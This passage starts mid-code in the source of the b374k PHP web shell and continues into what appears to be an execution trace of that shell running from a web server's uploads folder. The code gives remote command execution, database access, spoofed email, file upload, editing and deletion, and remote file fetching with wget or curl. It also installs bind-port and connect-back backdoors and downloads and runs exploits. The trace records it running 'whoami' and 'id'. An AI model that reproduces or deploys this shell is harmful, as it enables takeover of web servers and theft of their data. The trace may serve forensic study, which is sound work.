"<td>$data</td>"; } $msg .= "</tr>"; } $msg .= "</table>"; $head = "<div style=\\"padding:10px 0 0 6px;\\"> <form action=\\"?\\" method=\\"get\\"> <input type=\\"hidden\\" name=\\"y\\" value=\\"".$pwd."\\" /> <input type=\\"hidden\\" name=\\"x\\" value=\\"mysql\\" /> <input type=\\"hidden\\" name=\\"sqlhost\\" value=\\"".$sqlhost."\\" /> <input type=\\"hidden\\" name=\\"sqluser\\" value=\\"".$sqluser."\\" /> <input type=\\"hidden\\" name=\\"sqlport\\" value=\\"".$sqlport."\\" /> <input type=\\"hidden\\" name=\\"sqlpass\\" value=\\"".$sqlpass."\\" /> <input type=\\"hidden\\" name=\\"db\\" value=\\"".$db."\\" /> <input type=\\"hidden\\" name=\\"table\\" value=\\"".$table."\\" /> Page <select class=\\"inputz\\" name=\\"z\\" onchange=\\"this.form.submit();\\">"; for($i = 1;$i <= $totpage;$i++){ $head .= "<option value=\\"".$i."\\">".$i."</option>"; if($i == $_GET[\'z\']) $head .= "<option value=\\"".$i."\\" selected=\\"selected\\">".$i."</option>"; } $head .= "</select><noscript><input class=\\"inputzbut\\" type=\\"submit\\" value=\\"Go !\\" /></noscript></form></div>"; $msg = $msgq.$head.$msg; } elseif(isset($_GET[\'submitquery\']) && ($_GET[\'sqlquery\'] != "")){ $db = $_GET[\'db\']; $query = magicboom($_GET[\'sqlquery\']); $msg = "<div style=\\"width:99%;padding:0 10px;\\"><form action=\\"?\\" method=\\"get\\"> <input type=\\"hidden\\" name=\\"y\\" value=\\"".$pwd."\\" /> <input type=\\"hidden\\" name=\\"x\\" value=\\"mysql\\" /> <input type=\\"hidden\\" name=\\"sqlhost\\" value=\\"".$sqlhost."\\" /> <input type=\\"hidden\\" name=\\"sqluser\\" value=\\"".$sqluser."\\" /> <input type=\\"hidden\\" name=\\"sqlport\\" value=\\"".$sqlport."\\" /> <input type=\\"hidden\\" name=\\"sqlpass\\" value=\\"".$sqlpass."\\" /> <input type=\\"hidden\\" name=\\"db\\" value=\\"".$db."\\" /> <p><textarea name=\\"sqlquery\\" class=\\"output\\" style=\\"width:98%;height:80px;\\">".$query."</textarea></p> <p><input class=\\"inputzbut\\" style=\\"width:80px;\\" name=\\"submitquery\\" type=\\"submit\\" value=\\"Go !\\" /></p> </form></div> "; @mysql_select_db($db); $querys = explode(";",$query); foreach($querys as $query){ if(trim($query) != ""){ $hasil = mysql_query($query); if($hasil){ $msg .= "<p style=\\"padding:0;margin:20px 6px 0 6px;\\">".$query."; <span class=\\"gaya\\">[</span> ok <span class=\\"gaya\\">]</span></p>"; $msg .= "<table class=\\"explore\\" style=\\"width:99%;\\"><tr>"; for($i=0;$i<@mysql_num_fields($hasil);$i++) $msg .= "<th>".htmlspecialchars(@mysql_field_name($hasil,$i))."</th>"; $msg .= "</tr>"; for($i=0;$i<@mysql_num_rows($hasil);$i++) { $rows=@mysql_fetch_array($hasil); $msg .= "<tr>"; for($j=0;$j<@mysql_num_fields($hasil);$j++) { if($rows[$j] == "") $dataz = " "; else $dataz = $rows[$j]; $msg .= "<td>".$dataz."</td>"; } $msg .= "</tr>"; } $msg .= "</table>"; } else $msg .= "<p style=\\"padding:0;margin:20px 6px 0 6px;\\">".$query."; <span class=\\"gaya\\">[</span> error <span class=\\"gaya\\">]</span></p>"; } } } else { $query = "SHOW PROCESSLIST;\\nSHOW VARIABLES;\\nSHOW STATUS;"; $msg = "<div style=\\"width:99%;padding:0 10px;\\"><form action=\\"?\\" method=\\"get\\"> <input type=\\"hidden\\" name=\\"y\\" value=\\"".$pwd."\\" /> <input type=\\"hidden\\" name=\\"x\\" value=\\"mysql\\" /> <input type=\\"hidden\\" name=\\"sqlhost\\" value=\\"".$sqlhost."\\" /> <input type=\\"hidden\\" name=\\"sqluser\\" value=\\"".$sqluser."\\" /> <input type=\\"hidden\\" name=\\"sqlport\\" value=\\"".$sqlport."\\" /> <input type=\\"hidden\\" name=\\"sqlpass\\" value=\\"".$sqlpass."\\" /> <input type=\\"hidden\\" name=\\"db\\" value=\\"".$db."\\" /> <p><textarea name=\\"sqlquery\\" class=\\"output\\" style=\\"width:98%;height:80px;\\">".$query."</textarea></p> <p><input class=\\"inputzbut\\" style=\\"width:80px;\\" name=\\"submitquery\\" type=\\"submit\\" value=\\"Go !\\" /></p> </form></div> "; $dbs = array(); $msg .= "<table class=\\"explore\\" style=\\"width:99%;\\"><tr><th>available databases</th></tr>"; $hasil = @mysql_list_dbs($con); while(list($db) = @mysql_fetch_row($hasil)){ @array_push($dbs,$db); } @sort($dbs); foreach($dbs as $db){ $msg .= "<tr><td><a href=\\"?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$db."\\">$db</a></td></tr>"; } $msg .= "</table>"; } @mysql_close($con); } else $msg = "<p style=\\"text-align:center;\\">cant connect to mysql server</p>"; echo $msg; } else{ ?> <form action="?" method="get"> <input type="hidden" name="y" value="<?php echo $pwd; ?>" /> <input type="hidden" name="x" value="mysql" /> <table class="tabnet" style="width:300px;"> <tr><th colspan="2">Connect to mySQL server</th></tr> <tr><td> Host</td><td><input style="width:220px;" class="inputz" type="text" name="sqlhost" value="localhost" /></td></tr> <tr><td> Username</td><td><input style="width:220px;" class="inputz" type="text" name="sqluser" value="root" /></td></tr> <tr><td> Password</td><td><input style="width:220px;" class="inputz" type="text" name="sqlpass" value="password" /></td></tr> <tr><td> Port</td><td><input style="width:80px;" class="inputz" type="text" name="sqlport" value="3306" /> <input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitsql" /></td></tr> </table> </form> <?php }} elseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'mail\')){ if(isset($_POST[\'mail_send\'])){ $mail_to = $_POST[\'mail_to\']; $mail_from = $_POST[\'mail_from\']; $mail_subject = $_POST[\'mail_subject\']; $mail_content = magicboom($_POST[\'mail_content\']); if(@mail($mail_to,$mail_subject,$mail_content,"FROM:$mail_from")){ $msg = "email sent to $mail_to"; } else $msg = "send email failed"; } ?> <form action="?y=<?php echo $pwd; ?>&x=mail" method="post"> <table class="cmdbox"> <tr><td> <textarea class="output" name="mail_content" id="cmd" style="height:340px;">Hey there, please patch me ASAP ;-p</textarea> <tr><td> <input class="inputz" style="width:20%;" type="text" value="admin@somesome.com" name="mail_to" /> mail to</td></tr> <tr><td> <input class="inputz" style="width:20%;" type="text" value="b374k@fbi.gov" name="mail_from" /> from</td></tr> <tr><td> <input class="inputz" style="width:20%;" type="text" value="patch me" name="mail_subject" /> subject</td></tr> <tr><td> <input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="mail_send" /></td></tr></form> <tr><td> <?php echo $msg; ?></td></tr> </table> </form> <?php } elseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'phpinfo\')){ @ob_start(); @eval("phpinfo();"); $buff = @ob_get_contents(); @ob_end_clean(); $awal = strpos($buff,"<body>")+6; $akhir = strpos($buff,"</body>"); echo "<div class=\\"phpinfo\\">".substr($buff,$awal,$akhir-$awal)."</div>"; } elseif(isset($_GET[\'view\']) && ($_GET[\'view\'] != "")){ if(is_file($_GET[\'view\'])){ if(!isset($file)) $file = magicboom($_GET[\'view\']); if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($file)); $group=@posix_getgrgid(@filegroup($file)); $owner = $name[\'name\']."<span class=\\"gaya\\"> : </span>".$group[\'name\']; } else { $owner = $user; } $filn = basename($file); echo "<table style=\\"margin:6px 0 0 2px;line-height:20px;\\"> <tr><td>Filename</td><td><span id=\\"".clearspace($filn)."_link\\">".$file."</span> <form action=\\"?y=".$pwd."&view=$file\\" method=\\"post\\" id=\\"".clearspace($filn)."_form\\" class=\\"sembunyi\\" style=\\"margin:0;padding:0;\\"> <input type=\\"hidden\\" name=\\"oldname\\" value=\\"".$filn."\\" style=\\"margin:0;padding:0;\\" /> <input class=\\"inputz\\" style=\\"width:200px;\\" type=\\"text\\" name=\\"newname\\" value=\\"".$filn."\\" /> <input class=\\"inputzbut\\" type=\\"submit\\" name=\\"rename\\" value=\\"rename\\" /> <input class=\\"inputzbut\\" type=\\"submit\\" name=\\"cancel\\" value=\\"cancel\\" onclick=\\"tukar(\'".clearspace($filn)."_link\',\'".clearspace($filn)."_form\');\\" /> </form> </td></tr> <tr><td>Size</td><td>".ukuran($file)."</td></tr> <tr><td>Permission</td><td>".get_perms($file)."</td></tr> <tr><td>Owner</td><td>".$owner."</td></tr> <tr><td>Create time</td><td>".date("d-M-Y H:i",@filectime($file))."</td></tr> <tr><td>Last modified</td><td>".date("d-M-Y H:i",@filemtime($file))."</td></tr> <tr><td>Last accessed</td><td>".date("d-M-Y H:i",@fileatime($file))."</td></tr> <tr><td>Actions</td><td><a href=\\"?y=$pwd&edit=$file\\">edit</a> | <a href=\\"javascript:tukar(\'".clearspace($filn)."_link\',\'".clearspace($filn)."_form\');\\">rename</a> | <a href=\\"?y=$pwd&delete=$file\\">delete</a> | <a href=\\"?y=$pwd&dl=$file\\">download</a> (<a href=\\"?y=$pwd&dlgzip=$file\\">gzip</a>)</td></tr> <tr><td>View</td><td><a href=\\"?y=".$pwd."&view=".$file."\\">text</a> | <a href=\\"?y=".$pwd."&view=".$file."&type=code\\">code</a> | <a href=\\"?y=".$pwd."&view=".$file."&type=image\\">image</a></td></tr> </table> "; if(isset($_GET[\'type\']) && ($_GET[\'type\']==\'image\')){ echo "<div style=\\"text-align:center;margin:8px;\\"><img src=\\"?y=".$pwd."&img=".$filn."\\"></div>"; } elseif(isset($_GET[\'type\']) && ($_GET[\'type\']==\'code\')){ echo "<div class=\\"viewfile\\">"; $file = wordwrap(@file_get_contents($file),"240","\\n"); @highlight_string($file); echo "</div>"; } else { echo "<div class=\\"viewfile\\">"; echo nl2br(htmlentities((@file_get_contents($file)))); echo "</div>"; } } elseif(is_dir($_GET[\'view\'])){ echo showdir($pwd,$prompt); } } elseif(isset($_GET[\'edit\']) && ($_GET[\'edit\'] != "")){ if(isset($_POST[\'save\'])){ $file = $_POST[\'saveas\']; $content = magicboom($_POST[\'content\']); if($filez = @fopen($file,"w")){ $time = date("d-M-Y H:i",time()); if(@fwrite($filez,$content)) $msg = "file saved <span class=\\"gaya\\">@</span> ".$time; else $msg = "failed to save"; @fclose($filez); } else $msg = "permission denied"; } if(!isset($file)) $file = $_GET[\'edit\']; if($filez = @fopen($file,"r")){ $content = ""; while(!feof($filez)){ $content .= htmlentities(str_replace("\'\'","\'",fgets($filez))); } @fclose($filez); } ?> <form action="?y=<?php echo $pwd; ?>&edit=<?php echo $file; ?>" method="post"> <table class="cmdbox"> <tr><td colspan="2"> <textarea class="output" name="content"> <?php echo $content; ?> </textarea> <tr><td colspan="2">Save as <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="saveas" style="width:60%;" value="<?php echo $file; ?>" /><input class="inputzbut" type="submit" value="Save !" name="save" style="width:12%;" /> <?php echo $msg; ?></td></tr> </table> </form> <?php } elseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'upload\')){ if(isset($_POST[\'uploadcomp\'])){ if(is_uploaded_file($_FILES[\'file\'][\'tmp_name\'])){ $path = magicboom($_POST[\'path\']); $fname = $_FILES[\'file\'][\'name\']; $tmp_name = $_FILES[\'file\'][\'tmp_name\']; $pindah = $path.$fname; $stat = @move_uploaded_file($tmp_name,$pindah); if ($stat) { $msg = "file uploaded to $pindah"; } else $msg = "failed to upload $fname"; } else $msg = "failed to upload $fname"; } elseif(isset($_POST[\'uploadurl\'])){ $pilihan = trim($_POST[\'pilihan\']); $wurl = trim($_POST[\'wurl\']); $path = magicboom($_POST[\'path\']); $namafile = download($pilihan,$wurl); $pindah = $path.$namafile; if(is_file($pindah)) { $msg = "file uploaded to $pindah"; } else $msg = "failed to upload $namafile"; } ?> <form action="?y=<?php echo $pwd; ?>&x=upload" enctype="multipart/form-data" method="post"> <table class="tabnet" style="width:320px;padding:0 1px;"> <tr><th colspan="2">Upload from computer</th></tr> <tr><td colspan="2"><p style="text-align:center;"><input style="color:#000000;" type="file" name="file" /><input type="submit" name="uploadcomp" class="inputzbut" value="Go" style="width:80px;"></p></td> <tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr> </tr> </table></form> <table class="tabnet" style="width:320px;padding:0 1px;"> <tr><th colspan="2">Upload from url</th></tr> <tr><td colspan="2"><form method="post" style="margin:0;padding:0;" actions="?y=<?php echo $pwd; ?>&x=upload"> <table><tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="http://www.some-code/exploits.c"></td></tr> <tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr> <tr><td><select size="1" class="inputz" name="pilihan"> <option value="wwget">wget</option> <option value="wlynx">lynx</option> <option value="wfread">fread</option> <option value="wfetch">fetch</option> <option value="wlinks">links</option> <option value="wget">GET</option> <option value="wcurl">curl</option> </select></td><td colspan="2"><input type="submit" name="uploadurl" class="inputzbut" value="Go" style="width:246px;"></td></tr></form></table></td> </tr> </table> <div style="text-align:center;margin:2px;"><?php echo $msg; ?></div> <?php } elseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'netsploit\')){ if (isset($_POST[\'bind\']) && !empty($_POST[\'port\']) && !empty($_POST[\'bind_pass\']) && ($_POST[\'use\'] == \'C\')) { $port = trim($_POST[\'port\']); $passwrd = trim($_POST[\'bind_pass\']); tulis("bdc.c",$port_bind_bd_c); exe("gcc -o bdc bdc.c"); exe("chmod 777 bdc"); @unlink("bdc.c"); exe("./bdc ".$port." ".$passwrd." &"); $scan = exe("ps aux"); if(eregi("./bdc $por",$scan)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; } else { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; } } elseif (isset($_POST[\'bind\']) && !empty($_POST[\'port\']) && !empty($_POST[\'bind_pass\']) && ($_POST[\'use\'] == \'Perl\')) { $port = trim($_POST[\'port\']); $passwrd = trim($_POST[\'bind_pass\']); tulis("bdp",$port_bind_bd_pl); exe("chmod 777 bdp"); $p2=which("perl"); exe($p2." bdp ".$port." &"); $scan = exe("ps aux"); if(eregi("$p2 bdp $port",$scan)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; } else { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; } } elseif (isset($_POST[\'backconn\']) && !empty($_POST[\'backport\']) && !empty($_POST[\'ip\']) && ($_POST[\'use\'] == \'C\')) { $ip = trim($_POST[\'ip\']); $port = trim($_POST[\'backport\']); tulis("bcc.c",$back_connect_c); exe("gcc -o bcc bcc.c"); exe("chmod 777 bcc"); @unlink("bcc.c"); exe("./bcc ".$ip." ".$port." &"); $msg = "Now script try connect to ".$ip." port ".$port." ..."; } elseif (isset($_POST[\'backconn\']) && !empty($_POST[\'backport\']) && !empty($_POST[\'ip\']) && ($_POST[\'use\'] == \'Perl\')) { $ip = trim($_POST[\'ip\']); $port = trim($_POST[\'backport\']); tulis("bcp",$back_connect); exe("chmod +x bcp"); $p2=which("perl"); exe($p2." bcp ".$ip." ".$port." &"); $msg = "Now script try connect to ".$ip." port ".$port." ..."; } elseif (isset($_POST[\'expcompile\']) && !empty($_POST[\'wurl\']) && !empty($_POST[\'wcmd\'])) { $pilihan = trim($_POST[\'pilihan\']); $wurl = trim($_POST[\'wurl\']); $namafile = download($pilihan,$wurl); if(is_file($namafile)) { $msg = exe($wcmd); } else $msg = "error: file not found $namafile"; } ?> <table class="tabnet"> <tr><th>Port Binding</th><th>Connect Back</th><th>Load and Exploit</th></tr> <tr> <td> <table> <form method="post" actions="?y=<?php echo $pwd; ?>&x=netsploit"> <tr><td>Port</td><td><input class="inputz" type="text" name="port" size="26" value="<?php echo $bindport ?>"></td></tr> <tr><td>Password</td><td><input class="inputz" type="text" name="bind_pass" size="26" value="<?php echo $bindport_pass; ?>"></td></tr> <tr><td>Use</td><td style="text-align:justify"><p><select class="inputz" size="1" name="use"><option value="Perl">Perl</option><option value="C">C</option></select> <input class="inputzbut" type="submit" name="bind" value="Bind" style="width:120px"></td></tr></form> </table> </td> <td> <table> <form method="post" actions="?y=<?php echo $pwd; ?>&x=netsploit"> <tr><td>IP</td><td><input class="inputz" type="text" name="ip" size="26" value="<?php echo ((getenv(\'REMOTE_ADDR\')) ? (getenv(\'REMOTE_ADDR\')) : ("127.0.0.1")); ?>"></td></tr> <tr><td>Port</td><td><input class="inputz" type="text" name="backport" size="26" value="<?php echo $bindport; ?>"></td></tr> <tr><td>Use</td><td style="text-align:justify"><p><select size="1" class="inputz" name="use"><option value="Perl">Perl</option><option value="C">C</option></select> <input type="submit" name="backconn" value="Connect" class="inputzbut" style="width:120px"></td></tr></form> </table> </td> <td> <table> <form method="post" actions="?y=<?php echo $pwd; ?>&x=netsploit"> <tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="www.some-code/exploits.c"></td></tr> <tr><td>cmd</td><td><input class="inputz" type="text" name="wcmd" style="width:250px;" value="gcc -o exploits exploits.c;chmod +x exploits;./exploits;"></td> </tr> <tr><td><select size="1" class="inputz" name="pilihan"> <option value="wwget">wget</option> <option value="wlynx">lynx</option> <option value="wfread">fread</option> <option value="wfetch">fetch</option> <option value="wlinks">links</option> <option value="wget">GET</option> <option value="wcurl">curl</option> </select></td><td colspan="2"><input type="submit" name="expcompile" class="inputzbut" value="Go" style="width:246px;"></td></tr></form> </table> </td> </tr> </table> <div style="text-align:center;margin:2px;"><?php echo $msg; ?></div> <?php } elseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'shell\')){ ?> <form action="?y=<?php echo $pwd; ?>&x=shell" method="post"> <table class="cmdbox"> <tr><td colspan="2"> <textarea class="output" readonly> <?php if(isset($_POST[\'submitcmd\'])) { echo @exe($_POST[\'cmd\']); } ?> </textarea> <tr><td colspan="2"><?php echo $prompt; ?><input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:60%;" value="" /><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:12%;" /></td></tr> </table> </form> <?php } else { if(isset($_GET[\'delete\']) && ($_GET[\'delete\'] != "")){ $file = $_GET[\'delete\']; @unlink($file); } elseif(isset($_GET[\'fdelete\']) && ($_GET[\'fdelete\'] != "")){ @rmdir(rtrim($_GET[\'fdelete\'],DIRECTORY_SEPARATOR)); } elseif(isset($_GET[\'mkdir\']) && ($_GET[\'mkdir\'] != "")){ $path = $pwd.$_GET[\'mkdir\']; @mkdir($path); } $buff = showdir($pwd,$prompt); echo $buff; } ?> </div> </body> </html> ' /var/www/html/uploads/b374k.php 194 0
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $ver = '1.01'
3 9 0 0.003158 692672 getenv 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 'SERVER_SOFTWARE'
3 9 1 0.003177 692752
3 9 R 'Apache/2.4.52 (Ubuntu)'
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $software = 'Apache/2.4.52 (Ubuntu)'
3 10 0 0.003207 692720 ini_get 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 'safe_mode'
3 10 1 0.003222 692752
3 10 R FALSE
3 11 0 0.003236 692720 ini_get 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 'safe_mode'
3 11 1 0.003250 692752
3 11 R FALSE
3 12 0 0.003263 692720 strtolower 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 FALSE
3 12 1 0.003277 692752
3 12 R ''
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $safemode = FALSE
3 13 0 0.003302 692720 php_uname 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 0
3 13 1 0.003318 692832
3 13 R 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $system = 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
3 14 0 0.003353 692832 substr 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 3 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64' 0 3
3 14 1 0.003372 692960
3 14 R 'Lin'
3 15 0 0.003385 692864 strtolower 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 'Lin'
3 15 1 0.003399 692928
3 15 R 'lin'
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $win = FALSE
3 16 0 0.003425 692832 exe 1 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 'whoami'
4 17 0 0.003439 692832 function_exists 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 'system'
4 17 1 0.003453 692872
4 17 R TRUE
4 18 0 0.003467 692832 ob_start 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 0
4 18 1 0.003481 709344
4 18 R TRUE
4 19 0 0.003494 709344 system 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 'whoami'
4 19 1 0.004707 709416
4 19 R 'www-data'
4 20 0 0.004735 709344 ob_get_contents 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 0
4 20 1 0.004750 709384
4 20 R 'www-data\n'
3 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $buff = 'www-data\n'
4 21 0 0.004780 709384 ob_end_clean 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 0
4 21 1 0.004793 692872
4 21 R TRUE
3 16 1 0.004807 692872
3 16 R 'www-data\n'
3 22 0 0.004821 692872 rapih 1 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 'www-data\n'
4 23 0 0.004836 692872 str_replace 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 3 '<br />' '' 'www-data\n'
4 23 1 0.004860 692968
4 23 R 'www-data\n'
4 24 0 0.004874 692872 trim 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 'www-data\n'
4 24 1 0.004888 692944
4 24 R 'www-data'
3 22 1 0.004901 692912
3 22 R 'www-data'
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $user = 'www-data'
3 25 0 0.004927 692872 exe 1 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 'id'
4 26 0 0.004940 692872 function_exists 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 'system'
4 26 1 0.004955 692912
4 26 R TRUE
4 27 0 0.004968 692872 ob_start 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 0
4 27 1 0.004982 709384
4 27 R TRUE
4 28 0 0.004994 709384 system 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 'id'
4 28 1 0.006178 709496
4 28 R 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
4 29 0 0.006207 709384 ob_get_contents 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 0
4 29 1 0.006221 709464
4 29 R 'uid=33(www-data) gid=33(www-data) groups=33(www-data)\n'
3 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $buff = 'uid=33(www-data) gid=33(www-data) groups=33(www-data)\n'
4 30 0 0.006253 709464 ob_end_clean 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 0
4 30 1 0.006267 692952
4 30 R TRUE
3 25 1 0.006281 692952
3 25 R 'uid=33(www-data) gid=33(www-data) groups=33(www-data)\n'
3 31 0 0.006297 692952 rapih 1 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 'uid=33(www-data) gid=33(www-data) groups=33(www-data)\n'
4 32 0 0.006313 692952 str_replace 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 3 '<br />' '' 'uid=33(www-data) gid=33(www-data) groups=33(www-data)\n'
4 32 1 0.006331 693048
4 32 R 'uid=33(www-data) gid=33(www-data) groups=33(www-data)\n'
4 33 0 0.006346 692952 trim 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 'uid=33(www-data) gid=33(www-data) groups=33(www-data)\n'
4 33 1 0.006361 693064
4 33 R 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
3 31 1 0.006377 693032
3 31 R 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $id = 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $prompt = 'www-data $ '
3 34 0 0.006418 692992 getcwd 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 0
3 34 1 0.006433 693040
3 34 R '/var/www/html/uploads'
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $pwd = '/var/www/html/uploads/'
3 35 0 0.006461 693040 function_exists 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 'posix_getpwuid'
3 35 1 0.006476 693080
3 35 R TRUE
3 36 0 0.006489 693040 function_exists 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 'posix_getgrgid'
3 36 1 0.006503 693080
3 36 R TRUE
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $posix = TRUE
3 37 0 0.006529 693040 gethostbyname 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 'localhost'
3 37 1 0.006571 693120
3 37 R '127.0.0.1'
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $server_ip = '127.0.0.1'
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $my_ip = '127.0.0.1'
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $bindport = '13123'
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $bindport_pass = 'b374k'
3 38 0 0.006634 693080 explode 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 2 '/' '/var/www/html/uploads/'
3 38 1 0.006650 693688
3 38 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $pwds = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $pwdurl = ''
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $i = 0
3 39 0 0.006709 693616 sizeof 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
3 39 1 0.006727 693648
3 39 R 6
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $pathz = ''
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $j = 0
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $pathz .= '/'
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $j++
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $pwdurl .= '<a href="?y=/"> / </a>'
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $i++
3 40 0 0.006823 693696 sizeof 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
3 40 1 0.006841 693728
3 40 R 6
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $pathz = ''
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $j = 0
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $pathz .= '/'
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $j++
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $pathz .= 'var/'
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $j++
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $pwdurl .= '<a href="?y=/var/">var / </a>'
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $i++
3 41 0 0.006935 693728 sizeof 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
3 41 1 0.006954 693760
3 41 R 6
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $pathz = ''
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $j = 0
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $pathz .= '/'
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $j++
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $pathz .= 'var/'
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $j++
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $pathz .= 'www/'
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $j++
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $pwdurl .= '<a href="?y=/var/www/">www / </a>'
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $i++
3 42 0 0.007063 693768 sizeof 0 /var/www/html/uploads/b374k.php(194) : eval()'d code 2 1 [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
3 42 1 0.007081 693800
3 42 R 6
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $pathz = ''
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $j = 0
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $pathz .= '/'
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $j++
2 A /var/www/html/uploads/b374k.php(194) : eval()'d code 2 $pathz .= 'var/'
